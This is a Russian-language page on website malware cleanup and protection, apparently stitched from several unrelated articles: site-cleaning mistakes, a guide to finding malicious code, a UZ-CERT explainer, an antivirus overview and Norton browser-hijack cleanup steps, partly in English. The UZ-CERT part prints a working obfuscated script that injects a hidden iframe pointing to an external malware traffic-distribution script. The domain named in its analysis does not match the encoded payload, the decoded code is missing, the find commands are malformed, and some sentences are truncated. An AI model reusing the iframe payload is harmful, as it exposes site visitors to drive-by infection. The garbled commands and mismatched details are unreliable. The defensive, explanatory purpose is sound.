На сайте завелся вирус, и, как любой зараженный объект, ваш веб-ресурс превратился в один большой источник неприятностей: теперь он не только не приносит прибыль, но и порочит вашу репутацию в интернете, от вас отворачиваются покупатели, поисковые системы и даже хостер.

Вы остаетесь один на один со своей проблемой и пытаетесь решить ее собственными силами, не обращаясь к профессионалам, зато следуя советам «специалистов» с форумов. Или заказываете лечение сайта там, где «подешевле». Что поделать, ведь всегда хочется решить проблему как можно быстрее и с наименьшими затратами. Но всегда ли такой подход оправдан?

Представляем вашему вниманию ТОП-7 ошибок прошедшего года, которые совершали веб-мастера, стараясь восстановить работоспособность сайта после взлома и заражения.

Ошибка №1. Восстановление сайта из бэкапа как способ избавиться от вредоносного кода

Очень часто проблему заражения сайта вредоносным кодом веб-мастера пытаются решить откатом сайта до последней чистой версии. И продолжают восстанавливать веб-проект каждый раз, как только вирус на сайте вновь дает о себе знать. Увы, это неудобный и очень рисковый вариант.

Правильное решение: Сайт нужно лечить и ставить защиту от взлома, чтобы избежать повторного заражения. Во-первых, контент сайта может обновляться, на сайт могут устанавливаться новые плагины, в скрипты сайта могут вноситься изменения. Каждый откат назад означает, что вы теряете результаты трудов всех последних дней. Но есть и более важная причина для кардинальной борьбы со взломом: а что если хакер в один прекрасный день решит уничтожить ваш сайт полностью, ведь у него есть доступ к вашему веб-ресурсу?

Ошибка №2. Обман поисковика с целью вывода сайта из-под санкций

Сайт попадает в список «угрожающих безопасности компьютера или мобильного устройства…» из-за вируса на сайте или редиректа посетителей на зараженный ресурс. В панели веб-мастера отображаются примеры зараженных страниц, но хитрый или невежественный веб-мастер вместо решения проблемы (поиска и удаления источника вредоносного кода) удаляет некоторые страницы, которые показывают поисковики в примерах заражения. Или, как вариант, целиком блокируют доступ к сайту с помощью правил в robots.txt, наивно полагая, что это заблокирует и доступ антивирусному боту к сайту.

Правильное решение: Нужно найти вирусный код на сайте и удалить его. Запрещать индексацию не только бесполезно, но и опасно. Во-первых, страницы сайта могут выпасть из поискового индекса. Ну, а, во-вторых, робот антивирусного сервиса работает по правилам, отличным от правил поискового механизма, и запрет индексации на него никак не влияет.

Ошибка №3. Использование сканера вредоносного кода некомпетентными специалистами

С целью экономии или по каким-то другим причинам лечением сайта начинает заниматься недостаточно подготовленный специалист, который не может на 100% определить, является ли фрагмент, выделенный сканером вредоносного кода, действительно опасным. В результате можно наблюдать две крайности: удаляются абсолютно все подозрения на вирус, что приводит к поломке сайта, либо вредоносный код устраняется не полностью, что провоцирует рецидив.

Правильное решение: Очевидно, что лечением веб-ресурса должны заниматься профессионалы. В отчете сканеров вредоносного кода бывают ложные срабатывания, так как один и тот же фрагмент может использоваться как в легитимном коде, так и хакерском. Нужно анализировать каждый файл, иначе можно удалить критические элементы, что может привести к сбоям в работе сайта или его полной поломке. Или, наоборот, есть риск не распознать хакерский шелл, что приведет к повторному заражению веб-ресурса.

Ошибка №4. Игнорирование сообщений (в панели веб-мастера) о присутствии вредоносного кода на сайте

Уведомление о присутствии вредоносного кода на сайте в панели веб-мастера может быть непостоянным. Сегодня система пишет, что на вашем сайте вирус, а завтра - молчит. Владельцу сайта приятнее думать, что в системе произошел какой-то сбой, и его сайт вне всяких подозрений. Однако на практике все обстоит не так. Существуют разные виды заражений. Вредоносный код может появляться на сайте лишь на какое-то время, а потом исчезать. Это значит, что при очередной проверке сайта ботом антивируса поисковой системы вредонос может быть обнаружен, а при другой - нет. В результате веб-мастер «расслабляется» и начинает игнорировать опасное сообщение: «Зачем тратить время на лечение, ведь сайт не заблокировали».

Правильное решение: Если на сайте замечена вредоносная активность, скорее всего ваш, веб-ресурс взломан и заражен. Вирусы на сайте не появляются сами по себе. То, что вчера поисковик обнаружил подозрительный код на сайте, а потом «промолчал», не только не должно игнорироваться веб-мастером, а, наоборот, должно послужить сигналом к тревоге. Кто знает, каким образом ваш ресурс будет эксплуатироваться завтра? - Спам, фишинг или редиректы. Нужно сразу выполнить сканирование сайта на наличие хакерских бэкдоров, шеллов, пролечить и защитить от взлома.

Ошибка №5. Лечение сайтов фрилансерами-непрофессионалами.

В принципе, работа с фрилансерами в данном вопросе ничем не отличается от других сфер. Дешево - не всегда качественно, зато почти всегда без гарантий и договорных отношений. Большинство фрилансеров, не специализирующихся на проблемах безопасности сайтов, работают с последствиями хакерской атаки, но не с причиной - уязвимостями сайта. А это значит, что сайт могут взломать повторно. Хуже того, встречаются и недобросовестные исполнители, которые могут подсадить другой вредоносный код на сайт, украсть базу данных и т.п.

Правильное решение: Обратитесь в специализированную компанию, которая занимается лечением и защитой сайтов от взлома. Сотрудники таких компаний каждый день удаляют вредоносный код, видят мутацию вирусов и следят за эволюцией хакерских атак. Темный рынок взломов не стоит на одном месте, он развивается и требует постоянного мониторинга и соответствующих ответных действий при лечении и защите сайта от несанкционированных вторжений.

Ошибка №6. Ежедневное/еженедельное удаление одного и того же вируса с сайта.

Эта проблема касается особых «энтузиастов», которые готовы на регулярной основе устранять последствия взлома. Такие веб-мастера уже знают, какой конкретно код будет подсажен на сайт, конкретно куда и когда это произойдет. Так можно бесконечно бороться с мобильным редиректом, который ежедневно в 09-30 внедряется злоумышленником в файл.htaccess и перенаправляет ваш мобильный трафик на сайт по продаже виагры или порноконтента. Только вот незадача: хакерский бот делает это в автоматическом режиме, а вам приходится выполнять операцию по удалению вручную. Не честно ведь, правда?

Правильное решение: Можно бесконечно удалять последствия (вирусы, редиректы и пр.), но эффективнее проверить сайт на вредоносные и хакерские скрипты, удалить их и установить защиту от взлома, чтобы больше вирусный код не появлялся. А освободившееся время потратить более эффективно. Главное, помните, что у хакера уже есть доступ к вашему сайту, а это значит, что в следующий раз он может не ограничиться знакомым вам вредоносным кодом, а использовать ваш сайт для более серьезных кибер-преступлений.

Ошибка №7. Лечение завирусованного сайта антивирусом для компьютера

Понятие «антивирус» для некоторых веб-мастеров универсально, и они пытаются вылечить взломанный и зараженный сайт с помощью антивируса, предназначенного для компьютера. Делается бэкап сайта и проверяется десктопной версией антивирусного программного обеспечения. Увы, но такое лечение не в состоянии дать желаемых результатов.

Правильное решение: Вирусы на сайте и на компьютере - не одно и тоже. Для проверки сайта нужно использовать специализированное ПО или обращаться к специалистам. Десктопные антивирусы, какими бы хорошими они ни были, не предназначены для лечения сайтов от вирусов, так как их база данных ориентирована на вирусы и «трояны» на компьютере.

На этом все. Не наступайте на те же грабли!

Вредоносный код - это код, который мешает нормальной работе сайта. Он может встраиваться в темы, базы данных, файлы и плагины.

Больше видео на нашем канале - изучайте интернет-маркетинг с SEMANTICA

Результатом работы вредоносного кода может стать удаление части полезного контента, или его публикация на стороннем ресурсе. Таким способом злоумышленники могут организовать кражу контента. Особенно обидно, если этому воздействию подвергся молодой ресурс с авторскими статьями. Может сложиться впечатление что это он своровал контент у более старшего ресурса.

Также вредоносный код может разместить в бесплатной теме скрытые ссылки на сторонние страницы, доступные для поисковиков. Не всегда эти ссылки будут вредоносны, но вес основного сайта гарантированно пострадает.

Общее назначение всех вредоносных кодов сводится к нарушению работы веб-страниц.

Внешне вредоносный код представляет собой хаотичный набор символов. В действительности за этой бессмыслицей скрывается зашифрованный код, содержащий последовательность команд.

Как вредоносный код попадает на сайт

Есть два способа, как на сайт может попасть вредоносный код.

1. Скачивание файлов и плагинов с сомнительных и ненадежных ресурсов. Чаще всего таким способам на сайт проникают зашифрованные ссылки. Явный код редко проникает на сайт этим путем.

2. с последующим проникновением . Этот способ считается более опасным, ведь взлом веб-страницы дает возможность передать не только "одноразовый" код, но и целые конструкции с элементами вредоносной программы (malware).

Такой код очень тяжело уничтожить, т.к. он может восстанавливаться после удаления.

Проверка сайта на вредоносный код

Следует помнить, что эти коварные конструкции могут появиться не только в активной теме, но и в любом файле ресурса. Существует несколько способов их поиска:

• Вручную. Для этого нужно сравнить содержимое всех актуальных файлов с незараженными версиями бэкапа. Все что отличается необходимо удалить.
• С помощью плагинов безопасности. В частности WordPress предлагает плагин Wordfence Security. У него есть опция сканирования файлов страницы на содержание постороннего кода.
• С помощью саппорта хостинга. Владелец сайта имеет право обратиться к ним с просьбой просканировать ресурс своим антивирусом. В результате они предоставят отчет, отражающий наличие зараженных файлов. Эти файлы можно очистить от посторонних конструкций с помощью обычного текстового редактора.
• Через SSH-доступ к сайту. Сам поиск осуществляется с помощью команд:

find /текущий каталог страницы -type f -iname "*" -exek -"eval" {} \; > ./eval.log

find /текущий каталог страницы -type f -iname "*" -exek-"base64" {} \; > ./base64.log

find /текущий каталог страницы -type f -iname "*" -exek -"file_get_contents" {} \; > ./file_get_contents.log

В результате их выполнения будет получена информация о подозрительных файлах. Перечень этих файлов запишется в лог, хранящийся в текущей директории.

• Проверка сайта на вредоносный код с помощью функции eval. Эта php-функция запускает на выполнение любой, даже зашифрованный код. В качестве одного из аргументов, на вход этой функции подается тип кодировки (как правило это base64_decode или str_rot13). Именно благодаря использованию популярных кодировок вредоносный код выглядит как бессмысленный набор латинских символов.

Открываете редактор страницы.

Копируете в буфер содержимое файла functions.php.

Вставляете его в любой текстовый редактор (блокнот).

Находите команду eval.

• Перед тем, как удалить вредоносный код, проанализируйте, какие параметры функция ожидает на вход. Т.к. параметры поступают в зашифрованном виде, их нужно расшифровать с помощью декодеков. Распознав входной параметр, вы можете принять решение о его дальнейшем нахождении в тексте файла functions.php.

Удаление вредоносного кода

После обнаружения вредоносного кода его просто необходимо удалить как обычную строку в текстовом файле.

Защита от вредоносного кода

Для того, чтобы предупредить появление вредоносного кода на сайте, необходимо соблюдать ряд профилактических мер.

Используйте только проверенное ПО:

• Загружайте дистрибутивы только из надежных источников.
• Во время запускайте обновление серверного ПО.
• Совершайте регулярный аудит системы безопасности сервера.
• Удаляйте устаревшие отладочные скрипты.

Ставьте на серверное ПО надежные пароли:

• Придумайте конструкцию из 12 символов, включающую цифры и буквы разных регистров.
• Для каждого из сервисов придумайте свой уникальный пароль.
• Меняйте свои пароли раз в 3 месяца.

Осуществляйте контроль данных, вводимых пользователями:

• Настройте фильтры HTML-разметки в полях ввода, содержимое которых попадет в код страницы.
• Организуйте серверную проверку входных данных на соответствие допустимому интервалу.
• Используйте WAF. Web Application Firewall - это мощный инструмент защиты сайта от хакерских атак.

Разграничивайте права доступа к своему ресурсу.

Заблокируйте или ограничьте доступ к инструментам администрирования движка вашего сайта и его баз данных. Кроме того, закройте доступ к файлам настроек и резервным копиям рабочего кода.

Такому проникновению вредоносного кода наиболее подвержены те сайты, на которых реализована возможность загрузки пользовательских файлов.

1. Организуйте защиту от ботов. Для этих целей многие CMS оснащены специальными плагинами;

2. Настройте проверку вводимых пользователями данных:

• Запретите вставку JavaScript-кода внутри конструкции t>.
• Ведите перечень безопасных HTML-тегов и отсеивайте конструкции, не вошедшие в этот список.
• Анализируйте ссылки, которые присылают пользователи.
• Для этого существуют специальные сервисы, например Safe Browsing API. Он позволяет проверить безопасность документа по URL.

Как предупредить случайное размещение вредоносного кода.

• Тщательно следите за используемым ПО:

Загружайте библиотеки и расширения CMS только с проверенных источников, а лучше всего с официальных сайтов.

Изучайте код нестандартных расширений, которые вы собираетесь поставить на движок своего сайта.

• Размещайте рекламу очень осторожно:

Публикуйте на своей площадке объявления, которые предлагают только надежные рекламодатели.

Старайтесь размещать на своей странице статический контент.

Остерегайтесь партнерских программ со скрытыми блоками.

Рубрика: .

Данная статья ориентирована на пользователей сети Интернет и владельцев информационных ресурсов. Целью статьи является описание методов заражения веб-сайтов вредоносным кодом, возможными последствиями от этого и способы борьбы с вредоносным ПО.

Что же такое этот вредоносный код, откуда он берется и насколько это опасно?

Вредоносный код представляет собой ссылку на ресурс, содержащий вредоносное ПО. Наиболее встречаемые на сегодняшний день это либо поддельный антивирус (Fake Antivirus), либо модуль подмены выдачи поисковых запросов, либо ПО для рассылки спама. В некоторых случая вредоносное ПО может совмещать в себе функции кражи конфиденциальных данных с компьютера пользователя, к примеру, это могут быть пароли от административных интерфейсов управления веб-сайтами, пароли на ftp, аккаунты к онлайн сервисам.

1) Вредоносная ссылка ведет на систему распределения трафика (TDS). Система распределения трафика позволяет перенаправлять посетителя в зависимости от страны, операционной системы, браузера, используемого языка и других деталей на различные ресурсы. Ресурсы эти, в свою очередь, содержат вредоносное ПО именно для данной аудитории, либо данного, уязвимого ПО. Причем, в случае перехода по вредоносной ссылке с непредусмотренного злоумышленником браузера или версии операционной системы вы увидите либо просто пустой экран, либо, к примеру, поисковую страницу Google. Это немного затрудняет выявление вредоносного ПО. Тем не менее, при тщательном анализе можно понять логику системы и защититься от заражения.
2) Вредоносная ссылка ведет на «сплоиты» для популярных браузеров и программных продуктов. «Сплоиты» — это специально сформированные коды, использующие уязвимости в программном обеспечении для незаметной загрузки и исполнения на компьютере пользователя вредоносного ПО. В данном случае, определяется ПО пользователя и в случае его уязвимости происходит заражение.

Для сокрытия присутствия вредоносного кода на веб-сайте его шифруют, но встречаются случаи и открытого кода.

Пример шифрованной вредоносной ссылки: document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%74%6E%78%2E%6E%61%6D%65%2F%69%6E%2E%63%67%69%3F%33%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E’));

Проведем небольшой анализ структуры вредоносной ссылки:
имя домена — bestlotron.cn
скрипт — in.cgi (система распределения трафика SUTRA)
схема — cocacola51

Вредоносные ссылки с перенаправлением на систему распределения трафика в последнее время являются самыми встречаемыми. В данном случае злоумышленник, получив доступ к веб-сайту и внедрив вредоносную ссылку на систему распределения трафика на своем ресурсе, может управлять трафиком с этого веб-сайта. В схеме «cocacola51», которая указана в примере, может присутствовать не одно вредоносное ПО. Таким образом, система распределения трафика является всего лишь посредником между посетителем взломанного веб-сайта и вредоносным ПО злоумышленника.

Второй пример наглядно демонстрирует зашифрованную вредоносную ссылку. Как правило, для шифрования используются простые алгоритмы и практически в 99% такие ссылки без труда расшифровываются.

После расшифровки получаем следующий код:

Теперь мы можем наблюдать уже и адрес сайта, и знакомый нам по первому примеру скрипт системы распределения трафика со схемой 3.

Откуда же берется этот код на веб-сайтах и чем он может быть опасен?
Как правило, вручную веб-сайты уже не взламывают. Все давно автоматизировано. Для этих целей хакерами написано множество, как прикладных программ, так и серверных приложений. Самый распространенный процесс автоматизированного внедрения вредоносных ссылок на веб-сайты — это кража ftp паролей и дальнейшая обработка этих данных специализированным приложением Iframer. Работа Iframer’а проста — производить подключение к ресурсам по списку ftp аккаунтов, находить файлы по заданной маске, как правило, это файлы индексных страниц веб-сайтов, и внедрять в них уже готовый вредоносный код. Поэтому, после удаления кода, многие веб-сайты заражаются повторно, даже при смене всех паролей доступа, в том числе и на ftp. Причиной этому может служить наличие вируса для кражи паролей на компьютере, с которого осуществляется администрирование веб-сайтом.

Бывают случаи, когда владельцы веб-сайтов, на которых появляется вредоносный код, относятся несерьезно к данной проблеме. Согласен, вреда как такового самому ресурсу данный код не причиняет. Страдают лишь посетители зараженного веб-сайта. Но есть и другие стороны, на которые я хочу обратить внимание.

Веб-сайт, на котором находится вредоносный код, рано или поздно попадает во всевозможные базы разносчиков заразы – Malware site list, а также поисковые системы, такие как Google или Yandex, могут пометить зараженный веб-сайт как потенциально опасный. Убрать с такой базы свой ресурс при его попадании туда будет крайне сложно. Также, не исключена возможность рано или поздно получить «абузу» — жалобу от посетителей веб-сайта. В этом случае существует вероятность как блокирования доменного имени веб-сайта, так и блокирования его IP-адреса. Бывали случаи, когда из-за одного зараженного веб-сайта блокировались целые подсети.

Как же защититься от появления вредоносных кодов на своих ресурсах? Для этого необходимо выполнять ряд требований ИБ:

1) Установить на рабочий компьютер, с которого осуществляется администрирование веб-сайта антивирусное ПО, желательно лицензионное с ежедневно обновляемыми базами.
2) Установить и настроить межсетевой экран таким образом, чтобы весь трафик при работе с сетью проходил проверку и, в случае обращения к подозрительным хостам была возможность его блокирования.
3) Использовать сложные пароли на административные интерфейсы и доступы к сервисам ftp и ssh.
4) Не сохранять пароли в программах Total Commander, Far и других файловых менеджерах. Как правило, практически все троянские программы уже умеют захватывать эти данные и переправлять злоумышленнику.
5) Не открывать и не запускать полученные по электронной почте либо скачанные из сети Интернет файлы, предварительно не проверив их антивирусным ПО.
6) Обновлять программное обеспечение, установленное на компьютере. Своевременно устанавливать заплатки к операционным системам и обновлять прикладное ПО. Порой программы, которыми вы пользуетесь повседневно могут служить дырой в системе для проникновения вредоносного ПО. В частности Adobe Acrobat Reader, Flash Player, программы из пакета MS Office и др.

Если Вы соблюдаете все меры защиты, описанные выше, но обнаружили вредоносный код на своем ресурсе, виной этому может быть также и хостинг-провайдер, точнее настройки сервера на котором размещен ваш ресурс. В этом случае необходимо обратиться в службу поддержки вашего хостинг-провайдера и попросить их выявить и устранить причину инцидента.

Как Вы знаете, в Узбекистане в сентябре 2005 года по постановлению Президента страны была создана Служба реагирования на компьютерные инциденты UZ-CERT . Специалисты Службы помимо своих основных обязанностей также выполняют и работу по обнаружению вредоносных кодов на сайтах в национальной доменной зоне. Для этих целей был написан ряд прикладных программ для автоматизации основных моментов, но, конечно же, немаловажную роль играет и ручной просмотр подозрительных на заражение веб-сайтов. Порой удачно замаскированный вредоносный код подвергшийся «обфускации» — изменению структуры кода, автоматическими средствами обнаружить невозможно. Информация обо всех обнаруженных зараженных веб-сайтах публикуется на веб-сайте Службы, а также в разделе UZ-CERT на uForum.uz. Владельцы зараженных ресурсов получают оповещения, консультации и помощь для устранения угроз и дальнейшей защиты их систем. Мы искренне надеемся, что данная работа приносит пользу пользователям сети Интернет и помогает избежать массового заражения персональных компьютеров вредоносным ПО.

В Одноклассники

В настоящее время большинство компьютерных атак происходит при посещении вредоносных веб-страниц. Пользователь может быть введен в заблуждение, предоставляя конфиденциальные данные фишинг-сайту или стать жертвой атаки drive-by download, использующую браузерные уязвимости. Таким образом, современный антивирус должен обеспечивать защиту не только непосредственно от вредоносного ПО, но и от опасных веб-ресурсов.

Антивирусные решения используют различные методы для выявления сайтов с вредоносным ПО: сравнение базы данных сигнатур и эвристический анализ. Сигнатуры используются для точного определения известных угроз, в то время как эвристический анализ определяет вероятность опасного поведения. Использование базы вирусов является более надежным методом, обеспечивающим минимальное количество ложных срабатываний. Однако данный метод не позволяет обнаруживать неизвестные новейшие угрозы.

Появившаяся угроза сначала должна быть обнаружена и проанализирована сотрудниками лаборатории антивирусного вендора. На основании анализа создается соответствующая сигнатура, которая может быть использована для нахождения вредоносного ПО. Напротив, эвристический метод применяется для выявления неизвестных угроз на основании подозрительных поведенческих факторов. Данный способ оценивает вероятность опасности, поэтому возможны ложные срабатывания.

При обнаружении вредоносных ссылок оба метода могут работать одновременно. Чтобы добавить опасный ресурс в список запрещенных сайтов (blacklist) необходимо провести анализ, загрузив содержимое и просканировав его при помощи антивируса или системы обнаружения вторжений (Intrusion Detection System).

Ниже представлен лог событий системы Suricata IDS при блокировании эксплойтов:

Пример отчета системы IDS с указанием угроз, определенных с помощью сигнатур:

Пример предупреждения антивируса Ad–Aware при посещении вредоносного сайта:

Эвристический анализ выполняется на клиентской стороне для проверки посещаемых сайтов. Специально разработанные алгоритмы предупреждают пользователя в случае, если посещаемый ресурс отвечает опасным или подозрительным характеристикам. Данные алгоритмы могут быть построены на лексическом анализе контента или на оценки расположения ресурса. Лексическая модель определения используется для предупреждения пользователя при фишинг-атаках. Например URL адрес вида “http://paaypall.5gbfree.com/index.php ” или “http://paypal-intern.de/secure/ ” легко определяются как фишинг-копии известной платежной системы “paypal”.

Анализ размещения ресурса собирает информацию о хостинге и о доменном имени. На основании полученных данных специализированный алгоритм определяет степень опасности сайта. Эти данные обычно включают географические данные, информацию о регистраторе и о лице, зарегистрировавшем домен.

Ниже представлен пример размещения нескольких фишинг-сайтов на одном IP-адресе:

В конечном счете, несмотря на множество способов оценки сайтов, ни она методика не может дать 100%-ной гарантии защиты Вашей системы. Только совместное использование нескольких технологии компьютерной безопасности позволяет дать определенную уверенность в защите персональных данных.

Данная неполадка может быть вызвана внедрением вредоносной программы в браузер. Этот тип вредоносных программ направлен на изменение параметров браузера. Возможно возникновение любой из указанных ниже ситуаций:

Если на экране отобразится всплывающее окно со ссылкой на сторонний веб-сайт службы поддержки или вы уверены, что стали объектом мошеннических действий, ознакомьтесь со статьей .

Выполнение сканирования Norton Power Eraser - Сканирование на нежелательные приложения

Выберите в качестве расположения Рабочий стол и нажмите кнопку Сохранить .

Для запуска Norton Power Eraser дважды щелкните файл NPE.exe .

Если появилось окно

Сканирование на нежелательные приложения .

Результаты сканирования Norton Power Eraser будут показаны в окне .

В окне Сканирование на нежелательные приложения завершено нажмите кнопку Удалить напротив нежелательного приложения или панели инструментов.

Выполните показанные на экране инструкции.

После завершения процесса удаления перезагрузите компьютер.

Если Norton Power Eraser не удалось удалить нежелательные панели инструментов, удалите их вручную с помощью функции "Установка и удаление программ" или "Удаление программы" на панели инструментов. Программы показа рекламы обычно устанавливают новые панели инструментов в браузерах и изменяют службу поиска, применяемую по умолчанию. Для того чтобы полностью удалить нежелательные панели инструментов и службы поиска, необходимо сбросить настройки веб-браузера.

Запустите Internet Explorer.

В меню Сервис выберите Управление надстройками .

В окне Надстройки выберите Панели инструментов и расширения в разделе Типы надстроек .

Если показанный список будет содержать подозрительную панель инструментов, выберите ее и нажмите кнопку Отключить .

В окне Надстройки выберите Поставщики поиска в разделе Типы надстроек .

Выберите службу поиска и нажмите Использовать по умолчанию .

Выберите неизвестную службу поиска и нажмите Удалить и Закрыть .

В меню Сервис выберите Свойства обозревателя .

На вкладке Общие в разделе Домашняя страница введите адрес предпочитаемой начальной страницы.

Нажмите кнопки Применить и OK .

На рабочем столе щелкните правой кнопкой значок Internet Explorer и выберите Свойства .

В окне Свойства Internet Explorer на вкладке Ярлык удалите текст после iexplore.exe в поле Объект .

Нажмите Применить и OK для сохранения изменений.

Нажмите кнопку Закрыть .

Запустите Google Chrome.

В правом верхнем углу нажмите значок Настройка и управление Google Chrome , затем выберите Настройки .

В области Chrome нажмите Расширения .

В окне Расширения выберите неизвестные расширения и нажмите значок корзины.

В области Chrome нажмите Настройки .

В окне Настройки выберите Следующие страницы в разделе Начальная группа .

В окне Начальные страницы выберите подозрительные записи и нажмите значок X .

Нажмите кнопку OK .

В окне Настройки выберите Показывать кнопку "Главная страница" в разделе Внешний вид и нажмите Изменить .

В окне Главная страница выберите пункт Страница быстрого доступа и нажмите кнопку OK .

В окне Настройки нажмите в разделе Поиск .

В окне Поисковые системы выберите предпочитаемую поисковую систему и нажмите Использовать по умолчанию .

В списке Настройка поиска по умолчанию выберите неизвестную службу поиска и нажмите значок X .

Нажмите кнопку Готово .

Запустите Firefox.

В правом верхнем углу нажмите значок Открыть меню и выберите Дополнения .

На странице Управление дополнениями выберите Расширения .

Проверьте список расширений на наличие подозрительных записей. Если они есть, выберите расширение и нажмите Отключить .

Нажмите значок Открыть меню и выберите Настройки .

На вкладке Основные окна Настройки нажмите кнопку Восстановить по умолчанию .

Нажмите кнопку OK .

В окне Firefox нажмите значок со стрелкой вниз рядом с полем URL и выберите Управление поисковыми системами .

В окне Управление списком поисковых систем выберите неизвестную службу поиска и нажмите кнопку Удалить .

Нажмите кнопку OK .

Выполните сканирование Norton Power Eraser

Дважды щелкните файл NPE.exe для запуска Norton Power Eraser.

Если появилось окно Управление учетными записями пользователей , нажмите кнопку Да или Продолжить .

Ознакомьтесь с условиями лицензионного соглашения и нажмите кнопку Принять .

В окне Norton Power Eraser нажмите значок Сканировать на предмет угроз .

По умолчанию Norton Power Eraser выполняет сканирование системы на наличие руткитов и предлагает перезагрузить систему. В окне запроса на перезагрузку системы нажмите кнопку Перезагрузить . Для отказа от сканирования на наличие руткитов выберите .

После перезапуска компьютера процесс сканирования запускается автоматически. Выполните показанные на экране инструкции.

Дождитесь результатов сканирования.

Видеоролик Требуется дополнительная помощь? Check for incorrect DNS settings

control

Click the Network and Internet icon, and then click Network and Sharing Center . In the left pane, click Change adapter settings .

On Windows XP: Double-click the Network Connections icon.

Right-click the network adapter that is currently active, and then click Properties .

If the User Account Control prompt appears, click Yes or Continue .

In the Network Connection Properties window, under "This connection uses the following items", click Internet Protocol (TCP/IP) or Internet Protocol Version 4 (TCP/IPv4) .

Click Properties .

In the Internet Protocol (TCP/IP) Properties window, on the General tab, check the DNS server settings.

• If Use the following DNS server addresses radio button is selected, check the server addresses. Make sure that the DNS server addresses displayed are the same that are provided to you by your Internet service provider or your network administrator.

  If the DNS server address starts with 85.255.11x.x, then it is more likely that the DNS cache has been poisoned as the result of a Pharming attack.

Fix incorrect Windows host file settings

Press the Windows + R keys to open the Run dialog box.

Type in the following text, and then press Enter .

C:\Windows\System32\Drivers\etc

Replace the drive letter if C : drive is not the system drive.

For each Hosts file that you find, right-click the file, and then click Open With or Open .

Double-click Notepad from the list of programs.

Remove any line that appears in your hosts file without an # at the beginning, apart from the "127.0.0.1 localhost" line.

On the File menu, select Save .

Check if you can access the Internet.

Fix incorrect proxy settings

If you have not configured your computer to use proxy for the Internet connection, you can skip this Step.

Start Internet Explorer.

On the Tools menu, select Internet Options .

On the Connections tab, click LAN Settings .

Verify that your proxy settings are correct. Do one of the following:

If the proxy settings are incorrect, make sure that you enter the correct proxy settings.

If the proxy settings are correct, temporarily disable the proxy. Uncheck Use a proxy server for your LAN.

In the Internet Options window, click Apply > OK .

Uninstall or disable unknown toolbars

If you want to completely remove a toolbar, you can use Add/Remove Programs or Uninstall a Program in the Control Panel.

Start Internet Explorer.

On the Tools menu, click Manage Add-ons .

If you find any unknown toolbar that is listed, select the toolbar, and then click Disable .

Click Close .

If the issue persists, go to Step 5.

Run a scan using Norton Power Eraser

Save the file to Windows desktop.

Open the windows run dialog (Windows key+R).

Drag and drop NPE.exe into the run box, this will automatically populate it with the full path Add the following switch to the end of the line:

The run line should look like:

"C:\Documents and Settings\user_name\Desktop\NPE.exe" /VSS 111

Click OK .

If the scan comes clean, go to Step 6.